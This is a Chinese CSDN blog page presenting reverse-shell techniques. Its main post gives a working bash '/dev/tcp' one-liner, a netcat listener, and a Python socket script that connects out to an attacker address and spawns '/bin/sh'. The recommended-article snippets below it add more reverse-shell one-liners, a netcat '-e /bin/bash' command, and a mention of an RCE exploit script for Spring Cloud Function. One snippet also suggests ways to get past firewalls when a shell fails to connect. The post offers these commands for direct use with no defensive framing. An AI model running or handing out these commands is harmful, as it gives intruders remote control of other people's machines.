反弹shell

最新推荐文章于 2024-04-24 13:35:29 发布
最新推荐文章于 2024-04-24 13:35:29 发布
阅读量120 收藏
点赞数
文章标签: python shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sun172270102/article/details/120287334
版权

1、nc + bash反弹

        1)远端监听shell

                nc -lnvvp 7777

        2)提供shell端反弹

                bash -i &> /dev/tcp/远端ip/7777 0>&1

        3)执行完如上步骤后,远端(监听端)可获得步骤2反弹出的shell交互窗口;

2、python脚本反弹

        提供shell端执行:

import socket,os,subprocess,time

#time.sleep(60)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.68.126", 7777))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])' #-i参数可酌情去掉(放在开机脚本后台运行时可能需要去掉-i)

        监听端执行:

nc -lnvvp 7777
#监听到反弹shell后执行如下命令获取真正的shell:
python -c "import pty;pty.spawn('/bin/bash')"

sunshine008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
linux利用java反弹shell_从一次渗透谈到linux如何反弹shell
weixin_39624980的博客
02-26 532
[前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考]0x01 Bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1这里shell由bash解析,有时候是由sh解析,不一定百发百中***在虚拟机里面试过可行,替换成自己的地址和端口即可******/dev/[tcp|upd]/host/port是L...
如何将shell脚本正确的放在后台运行
热门推荐
chenliang
10-17 1万+
文章目录1.1 将shell脚本放在后台运行的方式1.2 &不是英文导致的大事故1.3 nohup配合&来使用,就不怕了 1.1 将shell脚本放在后台运行的方式 这个有很多种方式哈,可以百度。我常用以下两种 ####### 我常用的两种 & # 放在后台运行,但要注意了,不能是中文的哈。 nohup # 放在后台运行,会生成nohup.out文件,但我们可以不让其有这个文件 ####### 我现在这样用 nohup 配合 & 使用,这样就不用
反弹shell初识
无痕的博客
11-01 3840
反弹shell的指令与演示
Linux反弹shell
yy
04-21 4083
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
详解NC反弹shell的几种方法
01-08
正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Ansible 指定受控端使用Python的版本
shijin741231的博客
04-20 591
最近在装Ansible,有一台受控端Ubuntu16的服务器,安装了Python2.7.12和Pyhon3.5。当用Ansible连接它时,显示使用的是Python3.5。最后看文档,发现Ansible可以在hosts的文件中指定受控服上运行的Python
【编译程序介绍】
武帝为此的博客
04-22 1200
简单来说,编译程序是一个软件,它读取用某种编程语言编写的源代码,分析并转换成等效的、可执行的机器语言代码。这个过程涉及多个复杂的步骤,包括语法分析、语义分析、代码优化和代码生成等。
[python3] 读取一个正在更新的日志文件
最新发布
言之。
04-24 230
等同于–follow=name --retry,根据文件名进行追踪,并保持重试,即该文件被删除或改名后,如果再次创建相同的文件名,会继续追踪。这两种方法都会持续监听日志文件的变化,并实时读取新增的日志内容。你可以根据实际需求选择其中一种方法。要读取一个正在更新的日志文件(即实时写入的日志文件),你可以使用 Python 的。的技巧来实现实时读取。函数打开文件,并使用。
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 585
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
【InternLM实战营---第五节课作业】
weixin_45609124的博客
04-22 798
LMDeploy环境配置及基础使用
Pandas 2.2 中文官方教程和指南(十五)
龙哥盟
04-24 702
原文:pandas.pydata.org/docs/ 处理文本数据 原文:pandas.pydata.org/docs/user_guide/text.html 文本数据类型 在 pandas 中有两种存储文本数据的方式: object -dtype NumPy 数组。 StringDtype 扩展类型。 我们建议使用StringDtype来存储文本数据。 在 pandas 1.0 之前,object dtype 是唯一的选项。这在很多方面都是不幸的: 你可能会在object dty
[SWPUCTF 2021 新生赛]re2(不同字符加密相同,逆向修改范围)
2301_79326813的博客
04-23 154
无壳直接看ida。
python数据分析pyecharts【饼状图、直方图、词云、地图】
QAZWCC的博客
04-20 440
【代码】python数据分析pyecharts【饼状图、直方图、词云、地图】
Semibin2 GTDB 路径手动配置
Dylan's Blog
04-23 179
在 main.py 里的这部分代码的default 替换成你自己的 gtdb 的路径即可,当然,你也可以用参数输入对应的路径。将解压后的文件放到一个文件夹里,default 里填写这个文件夹的绝对路径。
反弹shell无法反弹
08-13
您好!关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定端口没有开放,那么反弹shell连接将无法建立。您可以通过扫描目标主机的端口来确定哪些端口是开放的,并调整反弹shell的配置以使用其中一个开放的端口。 3. 网络连接问题:有时候网络连接不稳定或存在其他问题,可能导致反弹shell无法成功。您可以尝试使用其他网络或通过网络工具进行连通性测试,以确保网络连接正常。 4. 权限问题:如果您没有足够的权限来执行反弹shell操作,那么它也可能失败。请确保您具有足够的权限,并尝试以管理员身份运行反弹shell。 请注意,反弹shell是一项潜在的非法活动,我们不鼓励或支持任何非法的行为。以上回答仅供技术讨论和参考,请在合法和合适的环境中使用这些知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值